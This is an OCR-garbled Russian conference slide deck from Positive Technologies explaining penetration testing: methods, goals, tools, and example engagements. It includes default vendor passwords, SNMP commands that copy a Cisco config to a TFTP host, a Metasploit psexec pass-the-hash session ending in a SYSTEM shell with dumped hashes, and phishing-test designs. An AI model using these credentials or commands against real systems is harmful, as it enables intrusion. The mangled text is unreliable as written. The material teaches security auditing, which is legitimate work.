Тестирование на проникновение 


Что такое? 


Дмитрий Евтеев (Positive Technologies) 
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Тестирование на проникновение != моделирование 
действий (не)реального злоумышленника 


М 


Тестирование на проникновение != инструментальное 
сканирование с ручной верификацией уязвимостей 


М 


Тестирование на проникновение - 


• это комплекс мероприятий, направленных на оценку текущего 
состояния процессов обеспечения ИБ 


• тестирование на преодоление защиты 


e это один из методов проведения аудита ИБ 
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Методика 


С одной стороны это 
e Open Source Security Testing Methodology Manual (О55ТММ) 


М 


e Web Application Security Consortium (МА5С) 
e Open Web Application Security Project (OWASP) 


С другой стороны это 
e Center of Internet Security (CIS) guides 


| 


• Стандарты серии 150 2700х 
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Возможности 
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Высокоуровневые 
• Внутренняя политика (пентест, как инструмент воздействия) 


• Оценка текущего состояния процессов обеспечения ИБ 


e Так надо (compliance) 


Технологические 
• Осуществить НСД во внутреннюю сеть со стороны сети 


Интернет 
• Получить максимальные привилегии в основных 
инфраструктурных системах (Active Directory, сетевое 


оборудование, СУБД, ЕКР и пр.) 
• Получить доступ к определенным информационным ресурсам 


• Получить доступ к определенным данным (информации) 
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Подходы 
Периметровый пентест (с последующим развитием атаки 


и 


во внутренней сети) 
• С уведомлением и без уведомления администраторов 


• Анализ защищенности беспроводных сетей 


Внутренний пентест 
• С рабочего места среднестатистического пользователя сети 


| 


е Из выбранного сегмента сети 
Тестирование отдельного компонента информационнои 


системы (анализ защищенности) 


| 


• Черный-, серый- белый-ящик 
Оценка осведомленности сотрудников компании в 
вопросах информационной безопасности 


н 


POSITIVE ТЕСНМОССОЫЕ 


Реальная атака М5 тестирование на проникновение 
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Для непосредственного исполнителя пентест - это ВЗЛОМ! 
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Ограничения 
• Соблюдение законов РФ 
• Ограниченное время 
• Минимизация воздействия 


• Отсутствие услуги тестирования типа 0005 
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Неудобства 
• Согласование действий (порой это доходит до абсурда!) 
• Ответственность/ Аккуратность 


и 


Преимущества 
• Не нужно скрывать свою активность 
• Упрощение процесса по идентификации периметра сети 
• Возможность перехода к серому- и белому-ящику 


POSITIVE ТЕСНМОССОЫЕ 


Используемые инструменты 


= роз ме Technologies МахРагго! 


= М№Мтар/апѕепит/аід ... 


= Immunity Canvas (VulnDisco, Agora Раск, Voip Раск) 


= Metasploit 

== THC Hydra/THC PPTP bruter/ncrack ... 
== Cain and Abel/Wireshark 

= Aircrack 


= Yersinia 


== Браузер, блокнот... 
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Проблема защиты М/еБ-приложении 


27% 


Межсайтовое выполнение сценариев 


49% 


Внедрение операторов 501 


Утечка информации 


21% 


Предсказуемое расположение ресурсов 


38% 


Уязвимые конфигурации сервера 


Подбор 22% 


0% 10% 20% 30% 40% 50% 60% 


Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа 
методом «черного ящика» (данные за 2009 год, ћЁёр://рѕесигіќу.ги/апаіуёісѕ.аѕр) 
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Примеры пентестов: Мер-приложенил 


Что такое пентест веб-приложения методикой черного-ящика? 


Уязвимость 1: подбор пароля 
Impact: доступ к приложению (с ограниченными привилегиями) 


Уязвимость 2: внедрение операторов 501 
Impact: только чтение файлов (включена опция magic quotes) 


Уязвимость 3: выход за каталог 
Impact: только чтение файлов (потенциально ПЕТ) 


Уязвимость 4: предсказуемое значение идентификатора загружаемого файла 
Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере 


Следующий шаг - РАЗВИТИЕ АТАКИ 


Мер-сервер 


Проверка 1 


= Проверка ММ 
роверка М 


Рабочее место аудитора 


Проверка 2 | 
Найдена у ука вимост > 


| у 


Найдена уязвимость { „<; 
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облема слабых паролей 
Используется рекомендованная политика по заданию паролей 


120 


100 


Ы Символы английского алфавита в нижнем регистре, цифры и спец-символы № Другие наборы 


Пароль администратора такого домена? (совпадает с логином) 
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Примеры пентестов: Подбор паролей (дефолты) 


Общепринятые 
е адт!1:123456 
• Administrator:P@ssw0rd 


Џ 
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SAP 
e (DIAG) SAP*: 06071992, PASS 
манданты: ООО, 001, 066, все новые 


е (КЕС) ЗАРСРТС: ADMIN 
манданты:000, 001, 066, все новые 


Огас!е 
e зуз:тападег 


e су: спападе оп _іпѕіаі! 


i 
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== Cisco 


е Cisco:Cisco 


Џ 
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Примеры пентестов: 


ѕптрѕеї -v 1 -c private <сіѕсо> 
ѕптрѕеї -v 1 -c private <сіѕсо> 
snmpset -v 1 -c private <cisco> 
snmpset -v 1 -c private <cisco> 
snmpset -v 1 -c private <cisco> 
snmpset -v 1 -c private <cisco> 


snmpset -v 1 -c private <cisco> 
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Привет Павлик :) 


Уязвимость оос ш теи 
| Учетная запись „Ба CAWindows\System3Acmdee O O O | = зе 
| (Cisco 105 Software, 3700 Software 03745-13 К?5-М>,. Version 12.344212, RELEASE „| 
ОС БОЕТЧАВЕ <#с1 > 
| АС Support: ћЕбр: ым с18со соп“вас 


е Описание 
Найдена учетная запись. f = STRING: V“Ri.t.t" 
| INTEGER: 78 
Учетная запись п Тітеёіск=: <Ш» 0:00:00-00 
private 
Информация 


Cisco IOS Software, 3700 Software (С3745-А32К95-М), Version 12.3(4)72, RELEASE SOFTWARE (Ес1) 
TAC Support: http: лл dsco. com ас 

Copyright (с) 1986-2003 by Cisco Systems, Inc. 

Compiled Thu 18-Dec-03 18:34 Бу dchih 


.1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 
.1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 їпїедег 4 
.1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 
.1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> 
.1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config 
.1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 
.1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6 


Проблема разграничения доступа 


Сетевой доступ 
° Архитектура сети (ДМЗ, технологическая сеть, 
пользовательский сегмент, тестовая среда) 


М 


• Удаленный доступ к сети 


Доступ к данным 
• Общие ресурсы (пароли в 
открытом виде, резервные 
копии данных, различная 
чувствительная информация) | 


М 


е У/еБ-приложения, СУБД, ERP 
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Проблема управления доступом 


Ц 


Разделение полномочии между администраторами 


М 


Пользователи с повышенными привилегиями 


Ц 


Сервисы (!) с не требуемым уровнем доступа 


Ц 


Общая проблема управления идентификаторами 
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Примеры пентестов: Использование уязвимостей 


CANVAS && Metasploit 


Их) 


payload ма мок, е ће] 1 “Вл па Еср 


Текущие 19216837 о 

| РОРТ 4444 Target (ы) аА Screen Shots 

pioitpsexec) > 5 ЕНОТ 192.168.5.7 

 192.158.5,.7 рево узлов | Exploit Описание | 

ploité ( рхежес) 1 > set SMBUser Administrator 

Administrator ел управление | CANVAS world Мар | CmdLine | 
‚ set УМВРа55 аай35435551404ееаай3 5436555 1404ее :е19ссТу ве дер оба 
8436435 51404 ееаа93643565 1404 ве ге] УссТубевојеређова о 007 А 13 съ? | | 

cploitpsexec) > exploit 


ПО: 0-=0 
197.168.0.7 


wina ЕК [= 


Started bind handl 
Connecting to the 
Authenticating as 

Uploading payload... 

Created MamewgJgQIt. exe... 

pi nding to 367 габра 144-351-а932-987038001003 :2. Оапсасп_пр :192.168.5.7[ 
Bound to 367а5ћђ8а1-9844-3511-а932-987038001003 : 2. Орапсасп_пр:192.168,5. 7 [№5 
Obtaining а serw ісе manager handle... 
Creating а new serwice (PdLwWtsuk - "MckvotjirDWTwkAeA]SEJnIODgZ У)... 
Closing serwice handle... 
Opening =егъу1се.. 

Starting the зегутсе. 
Кетомтпо the =егулсе... 
Closing serwice папа! 
Deleting ателјотЕ,ехе. 
Sending stage (240 by е5) 
Сотпапа shell session 2 Орепей (172.30.0. 240: 2978 -> 192.166.5.7:4444) 


ID: 0-=0-=0 


ЧОЕ 
ми за Моје 10: 0-=0-=0-20 
ШИШЕДЕ = 


Microsoft Windows [version 5.2.3790] 
mms 


(су Copyright 1985-2003 Mic оО Corp. 


СМЕО systemi 2 > уло айтп 
мис ат | 
nt authorit 


СЪ МО SYS 325 г НогОвег ak 4199921 Е 


Tue Маг 30 17:12:16 2010 JGetprocaddr  #Аглайос: Found загпзг У Заги озеНапа!е ak 74106029 

Tue Маг 30 17:12:12 2010 |1192,168.3.7/32) запг озеНапйе(дотапи returned 0 

Tue Мак 30 17:12:18 2010 1192,158,3,7/32) ЗатеСібѕеНапдіеѓћ5аг) returned 0 

Tue Маг 30 17:12:19 2010 |192.168.3.7/321 SamrEnumerateUsersInDomain returned 1 

Tue Маг 30 17:12:19 2010 10192.168,3,2/ 32 1 Administrator 500: аа435435551404ееаай35435551404ее:е19сс 5ee54e06b06a5907af l се: :: 
Тие Маг 30 17:12:19 2010 10192.168,3, 7732) џез: 501 :ааду зБ4 3565 ] ФОЧевазо 35 43565 1 404 ве: 3196 сер 16 ае9 316 7 3с594?20с089с0!:: 


Примеры пентестов: Расширение привилегий в Active 
Directory 
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Вариант 1: Подбор парола 
Вариант 2: Использование уязвимостей в сервисах на контроллерах домена 
Вариант 3: Проведение атаки Pass-the-hash 


Вариант 4: Создание нового пользователя с доменного компьютера, который 
посещает администратор домена 


Вариант 5: Проведение атаки типа «Отравление АКР кэша» (например, 
перехват сессии КОР, понижение уровня проверки подлинности до ГМ) 


Вариант 6: Проведение атаки NTLM Relay 


Вариант 7: Нахождение и восстановление system state домена (например, 
после успешной атаки на сервер резервного копирования) 


Вариант 8: Получение расширенных привилегий за счет других систем 
(пример, контроль над записями в корневых ОМ5 компании) 


Вариант 9: Получение расширенных привилегий за счет уязвимостей других 
систем (хранение паролей с использованием обратимого шифрования, 
использование небезопасных протоколов ит.д.) 


Вариант М... 
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Примеры пентестов: Анализ защищенности 


Се © 
~ 
ст А < 
СЕТЕВОЕ 
~ 
4 чу (Ф) ОБОРУДОВА | 
ё» НИЕ 
ме СЕТЕВОЕ Е 
X ` / ОБОРУДОВА СТ Ри 
НИЕ Внутренний пентест/аудит по 


результатам пентеста 


Внутренний к 


по результатам пентеста | 
+ в A 
СЕРВЕРЫ | ' 
и“ СЕРВЕРБ! 
ПОДОБРАН 
ПАРОЛБ 
РАБОЧИЕ 
СТАНЦИИ 
ПРОВЕДЕНИЕ 
ПРОВЕРОК 
ПРОВЕДЕНИЕ ME SERVER 
„ ПРОВЕРОК 


Рабочее 
место 
аудитора 
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ФИЛИАЛ 


| 


( 


|| 
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Сканирование сети 


Успешно подобран 


пароль! 
e Эксплуатация SQL 
Injection 
е Выполнение команд на 
сервере 


• Повышение привилегий 


е Атака на внутренние 
ресурсы 


Внутренний пентест 


е Установка сканера 
МахРа!го! 


• Поиск уязвимостей 


e Эксплуатация 
уязвимостей 


Перемещение в ИС ЦО 


• Проведение атаки на 
ресурсы ЦО 


Получение максимальных 
привилегий во всей сети! 


Примеры пентестов: Анализ защищенности 


Acrobat + 

Acrobat Reader 

Hardware Information 

IBM Lotus Notes 

iTunes 

Јаматм Platform 6, Standard Edition 

ЁШ Јаматм Platform 6, Standard Edition 6 05 

= зауатм Platform 6, Standard Edition 6 U7 
~ 

Выполнение произвольного кода 

Выполнение произвольного кода 

Неавторизованный доступ 

Неавторизованный доступ 

Неавторизованный доступ 

Обход механизма защиты 

Отказ в обслуживании 

Отказ в обслуживании 

Переполнение буфера 

Переполнение буфера 

Переполнение буфера 

Переполнение буфера 

Переполнение буфера в динамической памяти 

Переполнение буфера в стеке 

Повышение привилегий 


+ 
+» ШИШ 


% 9% 5 ууу ууу» 


№ Соответствие узлов стандартам 


Неприменимо 
13 узлов (28.89%) 
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pas Выполнение произвольного кода 


Не соответствует 


30 узлов (65.67%) 


Не определено 
7 узлов (4.4495 


Интегральные данные по требованиям всех узлов и задач 


24.21% 


5.0155 


Не граны ласы 0 Сет 

Срютветстецет 053 37 ПЕ 
На сотвитстеет ТЕ 24 29% 
Направи зыш? 33.71% 
На спретно TE 5.01% 
Итого : Пасат Шик. 


Примеры пентестов: Беспроводные сети 


„  Баспроводная 
(00) точка доступа 
(ММРАЛР5К) 


2. ПОДКЛЮЧЕНИЕ К ЛОЖНОЙ 
ТОЧКЕ. ДОСТУПА 


| Д. ПОПУЧЕНИЕ ДОСТУПА К 
(е) — | РЕСУРСАМ СЕТИ 
3. ДОСТУП К КОМПЬЮТЕРУ 


ПОЛЬЗОВАТЕЛЯ MO СОЗДАННОМУ 
КАНАЛУ WI-FI 


Ферма серверов 


1 ‚ СОЗДАНИЕ ЛОЖНОЙ ТОЧКИ 


ДОСТУПА и 
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Примеры пентестов: Оценка эффективности программы 


повышения осведомленности 
Рассылка провоцирующих сообщений по электронной почте 


\ 


| 


Рассылка провоцирующих сообщений с помощью системы ТСО (и 


М 


других ІМ) 


Распространение носителей информации, содержащих 


i 


провоцирующие данные 


Проведение опроса среди сотрудников 


Живой разговор (по телефону, skype) 
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Примеры пентестов: Пример набора проверок 


Описание сообщения 


Сообщение от авторитетного 
лица, содержащее приложенный 
исполняемый файл. 


Сообщение от внутреннего лица, 
содержащее ссылку на Web- 
сайт. Ссылка указывает на 
исполняемый файл. 


Сообщение от авторитетного 
лица, содержащее ссылку на 
Ме-сайт. 
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Реализуемая атака 


Распространение сетевых червей. 


Целевое заражение системы троянской 
программой. 


Атаки типа «фишинг». 


Распространение сетевых червей. 


Целевое заражение системы троянской 
программой. 


Использование уязвимостей ПО. 


Атаки типа «фишинг». 


Распространение сетевых червей. 


Целевое заражение системы троянской 
программой. 


Использование уязвимостей ПО. 


Контролируемые события 


Открытие почтового 
сообщения. 


Запуск приложенного файла. 


Открытие почтового 
сообщения. 


Загрузка файла с Web- 
сервера. 


Запуск файла. 


Открытие почтового 
сообщения. 


Переход по предложенной 
ссылке. 


Примеры пентестов: Оценка эффективности программы 


повышения осведомленности 


15% 


5% 


Пользователей перешло по ссылке [1 пентест) 
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2096 


Пользователей перешло по ссылке [регулярный пентест) 


Резюме 


С | 
о 
----- 
= 
-———_ 
о 
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Тестирование на проникновение 


– это комплекс мероприятий, позволяющий провести 
эффективную оценку текущего состояния процессов 
обеспечения информационной безопасности 


| 


Тестирование на проникновение 


— это поиск и использование недостатков в процессах 
обеспечения информационной безопасности 


• управление уязвимостями 
• управление конфигурациями 
• управление инцидентами 


• управление безопасностью веб-приложений, СУБД, ЕВР, 
проводными и беспроводными сетями и пр. 


е еїс 
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Вопросы? 


devteev@ptsecurity.ru 
http://devteev.blogspot.com/ 
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Спасибо за внимание! 


devteev@ptsecurity.ru 
http://devteev.blogspot.com/ 
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